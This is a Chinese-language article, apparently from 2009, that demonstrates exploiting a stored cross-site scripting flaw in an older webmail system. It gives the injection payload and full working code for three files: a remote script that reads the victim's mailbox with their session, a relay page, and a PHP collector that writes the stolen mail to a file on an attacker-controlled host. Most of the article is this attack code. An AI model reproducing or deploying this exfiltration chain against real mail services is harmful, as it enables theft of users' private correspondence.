2009-4
3
本文试着从一个攻击的角度,对#邮旧版本系统中的一处持久跨站进行测试利用。寻找跨站漏洞,方法一般比较简单:在网页数据交互的地方,测试过滤字符。此关键字符“’’;:!—“=&#{()}/”,当然也可以用谷哥提供的审计XSS工具RatProxy进行测试了。
漏洞描述
在#邮系统,好像其版本标注的是Copyright © 1999 – 2007,新写邮件点击源文件编辑:
输入
<body><script>alert(/xss/)</script> </body> |
,点击发送邮件,在接受此邮件时,即有弹框。
当然在利用此漏洞时,我们需要远程引用一个JS文件了。修改代码如下:
<body><script src=”http://www.test.com/js.js”> /xss/</script> </body> |
就可以远程调JS文件。
漏洞利用:
此次漏洞利用流程,利用javascript的XMLHttpRequest对邮件内容读取提交。
当用户点击含有恶意代码的邮件时,就执行了插好的JS文件,此文件的作用是:利用当前用户的权限读取所有邮件内容,通过远程调用http://www.text.com/2.html文件进行邮件内容远程提交,达到阅读到受攻击用户的所有邮件内容。实现代码如下:
js.js 【读取所有邮件内容 远程调用2.html】
if (typeof XMLHttpRequest == "undefined" && window.ActiveXObject) {
function XMLHttpRequest() {
var arrSignatures = ["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.5.0", "MSXML2.XMLHTTP.4.0",
"MSXML2.XMLHTTP.3.0", "MSXML2.XMLHTTP",
"Microsoft.XMLHTTP"];
for (var i=0; i < arrSignatures.length; i++) {
try {
var oRequest = new ActiveXObject(arrSignatures[i]);
return oRequest;
} catch (oError) {
//ignore
}
}
throw new Error("MSXML is not installed on your system.");
}
}
function getServerInfo1() {
var oRequest = new XMLHttpRequest();
oRequest.open("get", "http://www.邮件地址.com", false);
oRequest.send(null);
return oRequest.responseText;
}
var info=getServerInfo1();
document.write ("<iframe src="http://www.test.com/2.html#"+escape(info)+"">< /iframe>"); |
2.html 【提交数据】
<html>
<head>
<title>数据提交</title>
</head>
<body>
<script language="javascript">
var bXmlHttpSupport = (typeof XMLHttpRequest == "object" || window.ActiveXObject);
function httpPost(sURL, sParams) {
var oURL = new java.net.URL(sURL);
var oConnection = oURL.openConnection();
oConnection.setDoInput(true);
oConnection.setDoOutput(true);
oConnection.setUseCaches(false);
oConnection.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
var oOutput = new java.io.DataOutputStream(oConnection.getOutputStream());
oOutput.writeBytes(sParams);
oOutput.flush();
oOutput.close();
var sLine = "", sResponseText = "";
var oInput = new java.io.DataInputStream(oConnection.getInputStream());
sLine = oInput.readLine();
while (sLine != null){
sResponseText += sLine + "n";
sLine = oInput.readLine();
}
oInput.close();
return sResponseText;
}
function addPostParam(sParams, sParamName, sParamValue) {
if (sParams.length > 0) {
sParams += "&";
}
return sParams + encodeURIComponent(sParamName) + "="
+ encodeURIComponent(sParamValue);
}
function addURLParam(sURL, sParamName, sParamValue) {
sURL += (sURL.indexOf("?") == -1 ? "?" : "&");
sURL += encodeURIComponent(sParamName) + "=" + encodeURIComponent(sParamValue);
return sURL;
}
if (typeof XMLHttpRequest == "undefined" && window.ActiveXObject) {
function XMLHttpRequest() {
var arrSignatures = ["MSXML2.XMLHTTP.5.0", "MSXML2.XMLHTTP.4.0",
"MSXML2.XMLHTTP.3.0", "MSXML2.XMLHTTP",
"Microsoft.XMLHTTP"];
for (var i=0; i < arrSignatures.length; i++) {
try {
var oRequest = new ActiveXObject(arrSignatures[i]);
return oRequest;
} catch (oError) {
//ignore
}
}
throw new Error("MSXML is not installed on your system.");
}
}
var Http = new Object;
Http.post = function (sURL, sParams, fnCallback) {
if (bXmlHttpSupport) {
var oRequest = new XMLHttpRequest();
oRequest.open("post", sURL, true);
oRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
oRequest.onreadystatechange = function () {
if (oRequest.readyState == 4) {
fnCallback(oRequest.responseText);
}
}
oRequest.send(sParams);
} else if (navigator.javaEnabled() && typeof java != "undefined"
&& typeof java.net != "undefined") {
setTimeout(function () {
fnCallback(httpPost(sURL, sParams));
}, 10);
} else {
alert("Your browser doesn't support HTTP requests.");
}
};
function getServerInfo(data) {
var sURL = "http://www.test.com/te.php";
var sParams = "";
sParams = addPostParam(sParams, "name", data);
sParams = addPostParam(sParams, "book", "Professional JavaScript");
Http.post(sURL, sParams, function (sData) {
alert("Data from server: " + sData);
});
}
var h = location.hash;
var a = h.split("#");
var b = unescape(a[ a.length-1]);
getServerInfo(b);
</script>
</script></body>
</html> |
te.php 【获取提交数据 写入文件】
< ?php
$filename = 'test.txt';
$somecontent=$_POST["name"];
if (is_writable($filename)) {
if (!$handle = fopen($filename, 'a')) {
print "不能打开文件 $filename";
exit;
}
if (!fwrite($handle, $somecontent)) {
print "不能写入到文件 $filename";
exit;
}
print "成功地将 $somecontent 写入到文件$filename";
fclose($handle);
} else {
print "文件 $filename 不可写";
}
?> |
一个邮箱的持久性跨站,就能带来用户的邮件信息的泄露,当然还有别的利用方法。
还没有任何评论。